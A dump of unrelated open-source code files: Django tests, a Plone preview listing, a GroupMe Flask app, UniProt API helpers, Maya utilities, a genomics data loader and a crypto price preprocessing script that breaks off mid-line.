\n    def test_delete_event_comment(self):\n        \"\"\"Test deleting the event comment by an authenticated user\"\"\"\n        url = delete_url(self.event.id, self.organizer_comment.id)\n        res = self.client.delete(url)\n        self.assertEqual(res.status_code, status.HTTP_204_NO_CONTENT)\n\n        self.organizer_comment.refresh_from_db()\n\n        self.assertFalse(self.organizer_comment.is_active)\n\n    def test_not_delete_event_comment_for_anyone(self):\n        \"\"\"Test that a user who is not the author cannot delete an event comment\"\"\"\n        url = delete_url(self.event.id, self.event_comment.id)\n        res = self.client.delete(url)\n        self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)\n","sub_path":"src/api/event/tests/test_event_comment_view.py","file_name":"test_event_comment_view.py","file_ext":"py","file_size_in_byte":8932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"167288650","text":"from ftw import bumblebee\nfrom ftw.bumblebee.interfaces import IBumblebeeDocument\nfrom opengever.base.browser.helper import get_css_class\nfrom plone.uuid.interfaces import IUUID\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\n\n\nclass PreviewListing(object):\n    \"\"\"The PreviewListing partial renders previews for a bunch of documents.\n\n    Usage:\n    - Instantiate with a view, in which this listing is rendered.\n    - Use ``.for_objects`` or ``.for_brains`` for defining the documents to\n      be displayed.\n    - Configure the fetch url with ``.with_fetch_url()``, make sure that\n      you setup allowed_attributes on your view when necessary.\n    - Maybe configure the batchsize, when needed.\n    \"\"\"\n\n    listing_template = ViewPageTemplateFile('templates/preview_listing.pt')\n    previews_template = ViewPageTemplateFile('templates/previews.pt')\n\n    def __init__(self, view):\n        \"\"\"Instantiate the preview listing with a view and a published accessor.\n        The view should have a publishable attribute for accessing these previews.\n\n        :param view: The browser view on which this listing is rendered.\n        :type view: BrowserView\n        \"\"\"\n        self.items = None\n        self.fetch_url = None\n        self.batchsize = 50\n        # context and request is required for rendering page templates.\n        self.context = view.context\n        self.request = view.request\n\n    def for_objects(self, objects):\n        \"\"\"Setup the preview listing with a list of Plone content objects.\n        \"\"\"\n        self.items = PreviewListingObjects(objects)\n        return self\n\n    def for_brains(self, brains):\n        \"\"\"Setup the preview listing with a list of catalog brains.\n        \"\"\"\n        self.items = PreviewListingBrains(brains)\n        return self\n\n    def with_fetch_url(self, fetch_url):\n        \"\"\"Configure the fetch url.\n        \"\"\"\n        self.fetch_url = fetch_url\n        return self\n\n    def with_batchsize(self, batchsize):\n        \"\"\"Configure the batchsize.\n        \"\"\"\n        self.batchsize = batchsize\n        return self\n\n    def render(self):\n        \"\"\"Render the items.\n        \"\"\"\n        assert self.items is not None, \\\n            'No items configured; use .for_objects() or .for_brains().'\n        assert self.fetch_url is not None, \\\n            'No fetch_url configured.'\n\n        number_of_documents = self.items.get_number_of_documents()\n        return self.listing_template(\n            available=number_of_documents > 0,\n            number_of_documents=number_of_documents,\n            fetch_url=self.fetch_url,\n            previews_html=self.render_batch(0))\n\n    def render_batch(self, first):\n        \"\"\"Return the batch to be rendered.\n\n        :param first: The index of the first item to return, 0-indexed.\n        :type first: int\n        \"\"\"\n        items = self.items.get_batch(first, self.batchsize)\n        if items:\n            return self.previews_template(\n                previews=map(self.items.get_infos_for, items))\n        else:\n            # We have to return an empty string if we have no more documents\n            # to render. Otherwise plone.protect will log an error-warning:\n            # WARNING plone.protect error parsing dom, failure to add csrf\n            # token to response.\n            return ''\n\n    def fetch(self):\n        \"\"\"Fetch the next batch.\n        \"\"\"\n        next_batch_first_index = int(self.request.get('documentPointer', 0))\n        self.request.response.setHeader('X-Theme-Disabled', 'True')\n        return self.render_batch(next_batch_first_index)\n\n\nclass PreviewListingItems(object):\n    \"\"\"PreviewListingItems provides information about the items to be rendered.\n\n    The PreviewListingItems is an abstract class, subclassed depending on the\n    type of items it holds (plone objects, brains).\n    The generic interface is used for providing rendering information about the\n    items without the need to normalize the items (e.g. get the object for a\n    brain).\n    It is implemented so that it can be used in a lazy manner for being\n    performance friendly.\n    \"\"\"\n\n    def __init__(self, items):\n        self.items = items\n\n    def get_batch(self, first, max_amount):\n        \"\"\"Slices the current items for rendering a specific batch of items.\n        The method may return a generator.\n        The method may return fewer items than ``max_amount``.\n\n        :param first: The index of the first item to return, 0-indexed.\n        :type first: int\n        :param max_amount: The maximum number of items to return.\n        :type max_amount: int\n        :returns: An iterable with 0 to maximum number of items.\n        \"\"\"\n        return self.items[first:first + max_amount]\n\n    def get_number_of_documents(self):\n        \"\"\"Return the total number of documents:\n\n        :returns: Total number of documents.\n        :rtype: int\n        \"\"\"\n        return len(self.items)\n\n    def get_infos_for(self, item):\n        \"\"\"Return the infos for this item as dictionary.\n        \"\"\"\n        raise NotImplementedError()\n\n\nclass PreviewListingObjects(PreviewListingItems):\n\n    def get_infos_for(self, obj):\n        return {\n            'title': obj.Title(),\n            'overlay_url': obj.absolute_url() + '/@@bumblebee-overlay-listing',\n            'uid': IUUID(obj),\n            'checksum': IBumblebeeDocument(obj).get_checksum(),\n            'mime_type_css_class': get_css_class(obj),\n            'preview_image_url': bumblebee.get_service_v3().get_representation_url(\n                obj, 'thumbnail')}\n\n\nclass PreviewListingBrains(PreviewListingItems):\n\n    def get_infos_for(self, brain):\n        return {\n            'title': brain.Title,\n            'overlay_url': brain.getURL() + '/@@bumblebee-overlay-listing',\n            'uid': brain.UID,\n            'checksum': brain.bumblebee_checksum,\n            'mime_type_css_class': get_css_class(brain),\n            'preview_image_url': bumblebee.get_service_v3().get_representation_url(\n                brain, 'thumbnail')}\n","sub_path":"opengever/bumblebee/browser/preview_listing.py","file_name":"preview_listing.py","file_ext":"py","file_size_in_byte":6008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
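# Hedged usage sketch for PreviewListing above. It only runs inside a Plone site
# with this package installed; MyDocumentsView, get_document_brains and the fetch
# URL are hypothetical names introduced for illustration.
from Products.Five.browser import BrowserView

class MyDocumentsView(BrowserView):

    def previews(self):
        return (PreviewListing(self)
                .for_brains(self.get_document_brains())  # hypothetical brain source
                .with_fetch_url(self.context.absolute_url() + '/@@my-view/fetch')
                .with_batchsize(25)
                .render())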
+{"seq_id":"251058285","text":"def sum_hourglass(arr, i, j):\n    return arr[i][j] + arr[i][j+1] + arr[i][j+2] + arr[i+1][j+1] + arr[i+2][j] + arr[i+2][j+1] + arr[i+2][j+2]\n\n\ndef hourglassSum(arr):\n    row_number = len(arr)\n    column_number = len(arr[0])\n    print(\"arr is a matrix with {row} rows and {column} columns\".format(row=row_number, column=column_number))\n    hourglass_number = []\n    for i in range(row_number):\n        for j in range(column_number):\n            if (i + 3) <= row_number and (j + 3) <= column_number:\n                total = sum_hourglass(arr, i, j)\n                print(\"{}, {} is an hourglass\".format(i, j))\n                hourglass_number.append(total)\n    print(max(hourglass_number))\n    print(max([sum_hourglass(arr, i, j) for i in range(row_number) for j in range(column_number) if (i + 3) <= row_number and (j + 3) <= column_number]))\n\n\nif __name__ == '__main__':\n    arr = [\n        [1, 1, 1, 0, 0, 0],\n        [0, 1, 0, 0, 0, 0],\n        [1, 1, 1, 0, 0, 0],\n        [0, 0, 0, 0, 0, 0],\n        [0, 0, 0, 0, 0, 0],\n        [0, 0, 0, 0, 0, 0]\n    ]\n    hourglassSum(arr)\n","sub_path":"easy_exercises/2d_array.py","file_name":"2d_array.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"344069058","text":"import argparse\nfrom open3d import *\n\ndesp = '''\nViewer for 3D point cloud files in pcd format\n'''\nparser = argparse.ArgumentParser(description=desp)\nparser.add_argument(\"input.pcd\", help='3D point cloud file(s) in pcd format (multiple files allowed)', nargs='+')\nargs = parser.parse_args()\n\npcds = []\nfor f in vars(args)[\"input.pcd\"]:\n    pcd = read_point_cloud(f)\n    pcds.append(pcd)\n\ndraw_geometries(pcds)\n\nif len(pcds) > 1:\n    for pcd in pcds:\n        draw_geometries([pcd])\n\n#vis = Visualizer()\n#vis.create_window()\n#vis.add_geometry(pcds[0])\n#vis.run()\n#vis.destroy_window()\n#vis = Visualizer()\n#vis.create_window()\n#vis.add_geometry(pcds[1])\n#vis.run()\n#vis.destroy_window()\n\n#index = 0\n#def next_pcd(vis):\n#    vis.destroy_window()\n#    global index\n#    index += 1\n#    if index >= len(pcds):\n#        index -= 1\n#    print(index)\n#    vis = Visualizer()\n#    vis.create_window()\n#    vis.add_geometry(pcds[index])\n#    vis.run()\n#    vis.destroy_window()\n#def prev_pcd(vis):\n#    vis.destroy_window()\n#    global index\n#    index -= 1\n#    if index < 0:\n#        index = 0\n#    print(index)\n#    vis = Visualizer()\n#    vis.create_window()\n#    vis.add_geometry(pcds[index])\n#    vis.run()\n#    vis.destroy_window()\n#key_to_callback = {}\n#key_to_callback[ord(\"K\")] = next_pcd\n#key_to_callback[ord(\"J\")] = prev_pcd\n#draw_geometries_with_key_callbacks(pcds, key_to_callback)\n\n\n\n","sub_path":"0308_lidar_tools/view_pcd.r02.py","file_name":"view_pcd.r02.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"342169410","text":"from __future__ import division, absolute_import, print_function\nfrom .core import AbstractBatchDataLoader\nimport numpy as np\nfrom avutils import util\nfrom avutils import file_processing as fp\nfrom collections import namedtuple\n\n\nInterval = namedtuple(\"Interval\", [\"chrom\", \"start\", \"stop\", \"labels\"])\n\n\nclass AbstractSeqOnlyDataLoader(AbstractBatchDataLoader):\n\n\n    def __init__(self, batch_size,\n                       rc_augment,\n                       num_to_load_for_eval,\n                       wrap_in_keys=None):\n        super(AbstractSeqOnlyDataLoader, self).__init__(batch_size=batch_size)\n        self.rc_augment = rc_augment\n        self.num_to_load_for_eval = num_to_load_for_eval\n        self.to_load_for_eval_x = []\n        self.to_load_for_eval_y = []\n        self.wrap_in_keys = wrap_in_keys\n\n    def get_jsonable_object(self):\n        the_dict = super(AbstractSeqOnlyDataLoader, self).get_jsonable_object()\n        the_dict['rc_augment'] = self.rc_augment\n        the_dict['num_to_load_for_eval'] = self.num_to_load_for_eval\n        the_dict['wrap_in_keys'] = self.wrap_in_keys\n        return the_dict\n\n    def get_generator(self, loop_infinitely):\n        raise NotImplementedError()\n\n    def get_batch_generator(self):\n\n        fasta_generator = self.get_generator(loop_infinitely=True)\n\n        while True:\n            x_batch = []\n
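            # Each pass below collects batch_size examples; with rc_augment set, every
            # example is also appended as x[::-1, ::-1], so a yielded batch holds
            # 2 * batch_size rows. Assuming the usual A,C,G,T channel order, flipping
            # both the length and the channel axis of a one-hot sequence matrix is
            # exactly the reverse complement (A<->T, C<->G), so no explicit
            # base-complement lookup is needed.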
y_batch = []\n for i in range(self.batch_size):\n x,y,coor = fasta_generator.next()\n x_batch.append(x)\n y_batch.append(y)\n if (self.rc_augment):\n x_batch.append(x[::-1,::-1])\n y_batch.append(y)\n x_batch = np.array(x_batch)\n y_batch = np.array(y_batch)\n self.to_load_for_eval_x.extend(x_batch)\n self.to_load_for_eval_y.extend(y_batch)\n if (len(self.to_load_for_eval_x) > self.num_to_load_for_eval):\n self.to_load_for_eval_x =\\\n self.to_load_for_eval_x[-self.num_to_load_for_eval:]\n self.to_load_for_eval_y =\\\n self.to_load_for_eval_y[-self.num_to_load_for_eval:]\n\n if (self.wrap_in_keys is not None):\n yield ({self.wrap_in_keys[0]: x_batch},\n {self.wrap_in_keys[1]: y_batch})\n else:\n yield (x_batch, y_batch) \n\n def get_data_for_eval(self):\n if (self.wrap_in_keys is not None):\n return util.enum(\n X={self.wrap_in_keys[0]: np.array(self.to_load_for_eval_x)},\n Y={self.wrap_in_keys[1]: np.array(self.to_load_for_eval_y)})\n else:\n return util.enum(X=np.array(self.to_load_for_eval_x),\n Y=np.array(self.to_load_for_eval_y))\n\n def get_data(self):\n fasta_generator = self.get_generator(loop_infinitely=False)\n X = []\n Y = []\n for (x,y,coor) in fasta_generator:\n X.append(x)\n Y.append(y)\n if (self.wrap_in_keys is not None):\n return util.enum(X={self.wrap_in_keys[0]: np.array(X)},\n Y={self.wrap_in_keys[1]: np.array(Y)})\n else:\n return util.enum(X=np.array(X), Y=np.array(Y))\n\n\nclass SingleStreamSeqOnly(AbstractSeqOnlyDataLoader):\n\n def __init__(self, batch_size,\n bed_source,\n genomelake_data_source,\n rc_augment,\n num_to_load_for_eval,\n randomize_after_pass=True,\n random_seed=1,\n labels_dtype=\"int\",\n wrap_in_keys=None):\n super(SingleStreamSeqOnly, self).__init__(\n batch_size=batch_size,\n rc_augment=rc_augment,\n num_to_load_for_eval=num_to_load_for_eval,\n wrap_in_keys=wrap_in_keys)\n self.bed_source = bed_source\n self.genomelake_data_source = genomelake_data_source\n self.str_labels_dtype = labels_dtype\n self.randomize_after_pass = randomize_after_pass\n self.random_seed = random_seed\n self.labels_dtype=eval(labels_dtype)\n\n def get_jsonable_object(self):\n the_dict = super(SingleStreamSeqOnly, self).get_jsonable_object()\n the_dict['bed_source'] = self.bed_source\n the_dict['genomelake_data_source'] = self.genomelake_data_source\n the_dict['labels_dtype'] = self.str_labels_dtype \n the_dict['randomize_after_pass'] = self.randomize_after_pass\n the_dict['random_seed'] = self.random_seed\n return the_dict\n\n def get_generator(self, loop_infinitely):\n #read bed_source into memory\n bed_fh = fp.get_file_handle(self.bed_source)\n data = []\n print(\"Reading bed file \"+self.bed_source+\" into memory\")\n for a_row in bed_fh:\n a_row = a_row.rstrip().split(\"\\t\")\n data.append(Interval(\n chrom=a_row[0], start=int(a_row[1]), stop=int(a_row[2]),\n labels=[self.labels_dtype(x) for x in a_row[3:]]))\n print(\"Finished reading bed file into memory; got \"\n +str(len(data))+\"rows\")\n if (self.num_to_load_for_eval > len(data)):\n print(\"num_to_load_for_eval is \"+str(self.num_to_load_for_eval)\n +\" but length of data is \"+str(len(data))+\"; adjusting\")\n self.num_to_load_for_eval = len(data)\n random_obj = np.random.RandomState(self.random_seed)\n if (self.randomize_after_pass):\n data = shuffle_array(arr=data, random_obj=random_obj)\n\n #Set up the genomelake extractors\n import genomelake\n import genomelake.extractors\n extractor = genomelake.extractors.ArrayExtractor(\n datafile=self.genomelake_data_source)\n\n idx = 0\n while (idx < len(data)):\n 
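            # One interval per iteration: the slice below is extracted with
            # genomelake's ArrayExtractor and yielded as
            # (sequence_array, labels, (chrom, start, stop)); at the end of a full
            # pass the data is reshuffled when randomize_after_pass is set.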
\n            to_extract = data[idx:idx+1]\n            to_yield = extractor(to_extract)[0]\n            yield (to_yield, to_extract[0].labels,\n                   (to_extract[0].chrom,\n                    to_extract[0].start,\n                    to_extract[0].stop))\n\n            idx += 1\n            if (idx==len(data)):\n                if (loop_infinitely):\n                    if (self.randomize_after_pass):\n                        data = shuffle_array(arr=data, random_obj=random_obj)\n                    idx=0\n                else:\n                    raise StopIteration() \n\n\n#randomly shuffles the input array (Fisher-Yates)\n#mutates arr!\ndef shuffle_array(arr, random_obj):\n    for i in xrange(0,len(arr)-1):\n        #randomly select an index in [i, len(arr)-1]; numpy's randint\n        #excludes the high bound, so it must be len(arr), not len(arr)-1\n        chosen_index = random_obj.randint(i,len(arr))\n        val_at_index = arr[chosen_index]\n        arr[chosen_index] = arr[i]\n        arr[i] = val_at_index\n    return arr\n","sub_path":"momma_dragonn/data_loaders/genomelake_data_loader.py","file_name":"genomelake_data_loader.py","file_ext":"py","file_size_in_byte":6788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"585512142","text":"import os\n\nCLIENT_ID = os.environ['GROUPME_CLIENT_ID']\nACCESS_TOKEN = os.environ['GROUPME_ACCESS_TOKEN']\n\nimport requests, urllib\nfrom flask import Flask, redirect, render_template, request, session, url_for\nimport pandas as pd\n\napp = Flask(__name__)\n\napp.secret_key = os.environ['APP_SECRET_KEY']\n\n@app.route('/')\ndef homepage():\n    token = session.get('token')\n    if token is None:\n        return redirect(url_for('login'))\n    return redirect(url_for('groups'))\n\n@app.route('/login')\ndef login():\n    return render_template('index.html', auth_url = make_auth_url())\n\ndef make_auth_url():\n    params = {\"client_id\": CLIENT_ID}\n    url = \"https://oauth.groupme.com/oauth/authorize?\" + urllib.urlencode(params)\n    return url\n\n@app.route('/oauth_callback')\ndef oauth_callback():\n    token = request.args.get('access_token')\n    session['token'] = token\n    return redirect(url_for('groups'))\n\n@app.route('/groups')\ndef groups():\n    token = session.get('token')\n    params = {\"token\": token}\n    url = \"https://api.groupme.com/v3/groups?\" + urllib.urlencode(params)\n    data = requests.get(url).json()\n    groups = [(url_for('visualize', group_id=x['group_id']), x['name'])\n        for x in data['response']]\n    return render_template('groups.html', groups = groups)\n\ndef get_messages(group_id):\n    token = session.get('token')\n    msgs_url = \"https://api.groupme.com/v3/groups/%s/messages?\"\n    last_id = ''\n    msgs = []\n    while True:\n        if (last_id):\n            params = {\"token\": token, \"limit\": 100, \"before_id\": last_id}\n        else:\n            params = {\"token\": token, \"limit\": 100}\n        url = msgs_url % group_id + urllib.urlencode(params)\n        r = requests.get(url)\n        if (r.status_code == 304):\n            break\n        data = r.json()\n        new_msgs = data[\"response\"][\"messages\"]\n        last_id = new_msgs[-1][\"id\"]\n        msgs += new_msgs\n    return msgs\n\n@app.route('/data/<group_id>')\ndef data(group_id):\n    msgs = get_messages(group_id)\n    df = pd.DataFrame(msgs)\n    #reformat dataframe here\n    return df.to_json()\n\n@app.route('/visualize/<group_id>')\ndef visualize(group_id):\n    return render_template(\"visualize.html\", group_id = group_id)\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"238377431","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n@File : tosay.py\n@Time : 2020/12/25 21:36:58\n@Author: Morker\n@Blog : https://96.mk/\n@Email : i@96.mk\n\nIf you don't go through the cold, you can't get the fragrant plum blossom.\n'''\n\nimport 
os\nimport json\nimport time\nimport requests\nfrom config.data import Paths\nfrom config.colors import mkPut\n\n\ndef todaySay():\n # fileTamp = os.path.getctime(Paths.config[0] + 'today.json')\n fileTamp = os.stat(Paths.config[0]+'today.json').st_mtime\n timeArray = time.localtime(fileTamp)\n fileTime = time.strftime(\"%Y%m%d\", timeArray)\n osTime = time.strftime(\"%Y%m%d\", time.localtime())\n if fileTime != osTime:\n try:\n req = requests.get(\n \"https://rest.shanbay.com/api/v2/quote/quotes/today/\", timeout=3)\n except requests.exceptions.ConnectionError:\n print(mkPut.fuchsia(\"[{0}]\".format(time.strftime(\n \"%H:%M:%S\", time.localtime()))), mkPut.yellow(\"[warning]\"), \"更新每日一说超时\")\n with open(Paths.config[0]+'today.json', 'w', encoding=\"utf-8\") as f:\n f.write(req.text)\n\n with open(Paths.config[0]+'today.json', 'r', encoding=\"utf-8\") as f:\n today = json.load(f)\n content = today['data']['content']\n translation = today['data']['translation']\n author = \"--- {0}\".format(today['data']['author'])\n\n todaySays = '''\n{0}\n\n{1}\n\n\\t\\t\\t\\t\\t\\t{2}\n'''.format(content, translation, author)\n return todaySays\n","sub_path":"config/tosay.py","file_name":"tosay.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"148897754","text":"\"\"\"\nuniprot python interface\nto access the uniprot database\n\navailable services:\n map\n retrieve\n\"\"\"\nfrom requests.adapters import HTTPAdapter \nfrom requests.packages.urllib3.util.retry import Retry\nimport requests\nimport sys, argparse\nimport Bio.SeqIO as bpio\nfrom io import StringIO\n\nretry_strategy = Retry(total=3, status_forcelist=[104, 429, 500, 502, 503, 504], \n method_whitelist=[\"HEAD\", \"GET\", \"OPTIONS\", \"POST\"])\nadapter = HTTPAdapter(max_retries=retry_strategy)\nhttp = requests.Session() \nhttp.mount(\"https://\", adapter) \nhttp.mount(\"http://\", adapter)\ndef pfam_from_uniprot(uniprot):\n url_uniprot = f\"https://www.uniprot.org/uniprot/{uniprot}.xml\"\n r = http.get(url_uniprot)\n if r.ok:\n record = bpio.read(StringIO(r.text),\"uniprot-xml\")\n return [x.split(\":\")[1] for x in record.dbxrefs if x.startswith(\"Pfam:\") ]\n raise Exception(f\"error retrieving {uniprot}:{url_uniprot}\\n{r.text}\")\n #url_uniprot = f\"https://www.uniprot.org/uniprot/{uniprot}.xml\"\n #r = requests.get(url_uniprot)\n #if r.ok:\n # record = bpio.read(StringIO(r.text),\"uniprot-xml\")\n # return [x.split(\":\")[1] for x in record.dbxrefs if x.startswith(\"Pfam:\") ]\n #raise Exception(f\"error retrieving {uniprot}:{url_uniprot}\\n{r.text}\")\n\nurl = 'https://www.uniprot.org/'\n\ndef _retrieve(query, format='fasta'):\n \"\"\"_retrieve is not meant for use with the python interface, use `retrieve`\n instead\"\"\"\n \n return _map(query, 'ACC+ID', 'ACC', format=format) \n\ndef retrieve(ids, format='fasta'):\n \"\"\" request entries by uniprot acc using batch retrieval\n\n Args:\n query: list of ids to retrieve\n format: fasta by default\n\n Help:\n possible formats:\n txt, xml, rdf, gff\"\"\"\n if type(ids) is not list:\n ids = [ids]\n return _retrieve(' '.join(ids), format)\n\ndef _map(query, f, t, format='tab'):\n \"\"\" _map is not meant for use with the python interface, use `map` instead\n \"\"\"\n tool = 'uploadlists/'\n\n data = {\n 'from':f,\n 'to':t,\n 'format':format,\n 'query':query\n }\n #response = requests.post(url + tool, data=data)\n response = http.post(url + tool, data=data)\n page = response.text\n return 
page\n\ndef map(ids, f, t, format='tab'):\n \"\"\" map a list of ids from one format onto another using uniprots mapping api\n \n Args:\n query: id or list of ids to be mapped\n f: from ACC | P_ENTREZGENEID | ...\n t: to ...\n format: tab by default\n\n Help:\n for a list of all possible mappings visit\n 'https://www.uniprot.org/help/api_idmapping'\n \"\"\"\n if type(ids) is not list:\n ids = [ids]\n page = _map(' '.join(ids), f, t, format)\n result = dict()\n for row in page.splitlines()[1:]:\n key, value = row.split('\\t')\n if key in result:\n result[key].add(value)\n else:\n result[key] = set([value])\n return result\n","sub_path":"uniprot.py","file_name":"uniprot.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"455068843","text":"\"\"\"\nAuthor: Jason Labbe\n\nThis class holds generic functions that are geared towards a specific tool, with the idea in mind to be imported from other scripts\nCAUTION: Changing these functions may affect a lot of scripts, so make sure any modifications work!\n\"\"\"\n\nimport maya.cmds as cmds\n\n\nclass GeneralFunctions(object):\n def createCustomAttr(self, obj, longName, defaultValue, shortName=None, keyable=True, lock=False):\n \"\"\"\n Creates a custom attribute.\n Args:\n obj(string): Object to add attribute to.\n longName(string): Attribute's long name.\n defaultValue(typeless): Default value of attribute. The type of this variable determines what kind of attribute will be built.\n shortName(string): Attribute's short name.\n keyable(bool): Make attribute keyable and show up in the channel box.\n lock(bool): Lock attribute.\n \"\"\"\n if shortName is None:\n shortName = longName\n \n # Delete if attribute already exists\n attrExists = cmds.attributeQuery(longName, node=obj, exists=True)\n if attrExists:\n cmds.deleteAttr(\"{0}.{1}\".format(obj, longName) )\n \n # Build command to create attribute\n addAttrOptions = {str:', dt=\"string\"', unicode:', dt=\"string\"', int:', at=\"long\"', float:', at=\"float\"', bool:', at=\"bool\"'}\n attrType = type(defaultValue)\n addOption = addAttrOptions.get(attrType)\n addCommandStr = 'cmds.addAttr(\"{0}\", ln=\"{1}\", sn=\"{2}\", k={3}{4})'.format(obj, longName, shortName, keyable, addOption)\n exec(addCommandStr)\n \n # Set attribute's value\n if attrType == str or attrType == unicode:\n cmds.setAttr(\"{0}.{1}\".format(obj, longName), defaultValue, typ=\"string\", lock=lock)\n else:\n cmds.setAttr(\"{0}.{1}\".format(obj, longName), defaultValue, lock=lock)\n \n def getAttrValue(self, obj, attrName):\n \"\"\"\n Checks if attribute exists then gets its value.\n Args:\n obj(string): Object name\n attrName(string): Attribute name\n Returns:\n Attribute's value, or None if it fails\n \"\"\"\n attrExists = cmds.attributeQuery(attrName, node=obj, exists=True)\n if attrExists:\n attrValue = cmds.getAttr(\"{0}.{1}\".format(obj, attrName) )\n return attrValue\n \n def createWeakReference(self, obj, weakRefObj, attrName):\n \"\"\"\n Connect one object to another via weak reference.\n Args:\n obj(string): Object to hold weak reference.\n weakRefObj(string): Object that will be connected to weak reference attribute.\n attrName(string): Name of attribute.\n \"\"\"\n attrExists = cmds.attributeQuery(attrName, node = obj, exists = True)\n if attrExists:\n cmds.deleteAttr(\"{0}.{1}\".format(obj, attrName) )\n \n cmds.addAttr(obj, ln = attrName, at = \"message\")\n cmds.connectAttr(\"{0}.message\".format(weakRefObj), 
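# Hedged usage sketch for the uniprot helpers above. These calls hit the live
# uniprot.org API, so they are illustrative rather than test-safe; the accessions
# are public examples, and the values in the comments are expected-shape hints only.
if __name__ == '__main__':
    print(retrieve(["P12345"]).splitlines()[0])        # first FASTA header line
    print(map(["P69905"], "ACC", "P_ENTREZGENEID"))    # e.g. {'P69905': {'3039'}}
    print(pfam_from_uniprot("P69905"))                 # Pfam accessions, e.g. ['PF00042']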
\"{0}.{1}\".format(obj, attrName) )\n \n def getWeakReferenceObj(self, obj, attrName):\n \"\"\"\n Check's connection of attribute and returns an object used as a weak reference.\n Args:\n obj(string): Object that holds weak reference.\n attrName(string): Name of attribute.\n Returns:\n Weak reference object, None if it fails.\n \"\"\"\n attrExists = cmds.attributeQuery(attrName, node=obj, exists=True)\n if not attrExists:\n return\n \n weakReferences = cmds.listConnections(\"{0}.{1}\".format(obj, attrName) ) or []\n if weakReferences:\n return weakReferences[0]","sub_path":"maya/asset/libs/general_functions.py","file_name":"general_functions.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"140853685","text":"import requests\nimport csv\n\n# get your API key https://app.ioannotator.com/api\nparams= {'apikey': 'add your API key here'}\napi = 'https://api.ioannotator.com/import/texts'\n\n# sample csv can be found here https://github.com/Io-Annotator/Samples/blob/main/python/text/sample.csv\nwith open('./sample.csv') as csvfile:\n rows = csv.DictReader(csvfile, delimiter=';')\n\n for row in rows:\n\n data = {\n 'dataset': '5760835792142336',\n 'text': row['text']}\n\n x = requests.post(api, json = data, params=params)\n print(x)","sub_path":"python/text/import-csv.py","file_name":"import-csv.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"377749665","text":"import pandas as pd\nfrom datetime import datetime\nimport os\nimport numpy as np\nfrom collections import deque\nimport random\n\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Flatten, Dropout, Activation, LSTM, BatchNormalization, TimeDistributed\nfrom tensorflow.keras.callbacks import TensorBoard\n\n# This model will simply guess if the next price will be higher or lower than the current price\nSEQUENCE_LENGTH = 30\nFUTURE_DAY_TO_PREDICT = 1\nFILE_TO_PREDICT = \"BTC\"\n\nTRAIN_PERCENT = .80\n\n# Import and combine data into one dataframe\ndef createMainDf(file):\n dataset = f\"data/{file}.csv\"\n df = pd.read_csv(dataset)\n\n df['Date'] = df['Date'].map(lambda a: convertDate(a)) # Convert Date to Linux Epoch Time\n df.set_index(\"Date\", inplace=True)\n df = df[[\"Close\", \"Volume\"]]\n df = df.astype({f\"Volume\": float})\n df = df.astype({f\"Close\": float})\n\n # Sort by Date\n df.sort_index(inplace=True, ascending=True)\n\n return cleanData(df)\n\n# Convert String Date to Linux Epoch Time\ndef convertDate(date):\n timestamp = datetime.strptime(date, '%Y-%m-%d %I-%p')\n return (timestamp-datetime(1970,1,1)).total_seconds()\n\ndef cleanData(df):\n indices_to_keep = ~df.isin([np.nan, np.inf, -np.inf]).any(1)\n df = df[indices_to_keep].astype(np.float64)\n df.dropna(axis=0, inplace=True)\n df.dropna(axis=1, inplace=True)\n return df\n\n# Classify data as 0 if less than or = existing data or 1 if greater\ndef classify(current, future):\n if float(future) > float(current):\n return 1\n else:\n return 0\n\ndef addTargets(df):\n df['Future'] = df[f\"Close\"].shift(-FUTURE_DAY_TO_PREDICT)\n df['Target'] = list(map(classify, df[f\"Close\"], df[\"Future\"]))\n df = df.drop('Future', 1)\n return cleanData(df)\n\ndef splitTrainAndTest(df):\n dateValues = df.index.values\n last_x_pct = dateValues[-int((1-TRAIN_PERCENT)*len(dateValues))]\n \n train = df[df.index < last_x_pct]\n 
test = df[df.index >= last_x_pct]\n return train, test\n\ndef normalize(df):\n result = df.copy()\n for feature_name in df.columns:\n max_value = df[feature_name].max()\n min_value = df[feature_name].min()\n result[feature_name] = (df[feature_name] - min_value) / (max_value - min_value)\n result.fillna(0, inplace=True)\n return result\n\ndef getXandY(df):\n df = normalize(df)\n \n sequential_data = []\n previous_days = deque(maxlen=SEQUENCE_LENGTH)\n\n for i in df.values:\n previous_days.append([n for n in i[:-1]])\n if len(previous_days) == SEQUENCE_LENGTH:\n sequential_data.append([np.array(previous_days), i[-1]])\n # Sequential data is of form\n '''\n [\n ex 1:[\n [ [c0, v0], [c1, v1], ... [cn, vn] ],\n target0\n ],\n ex 2: [\n [ [c1, v1], [c2, v2], ... [cn1, vn1] ],\n target1\n ]\n ]\n '''\n random.shuffle(sequential_data)\n\n # Balance Data (Price going up, Price going down)\n increasing = []\n decreasing = []\n\n for seq, target in sequential_data:\n if target == 1:\n increasing.append([seq, target])\n elif target == 0:\n decreasing.append([seq, target])\n \n random.shuffle(increasing)\n random.shuffle(decreasing)\n\n minimumLength = min(len(increasing), len(decreasing))\n increasing = 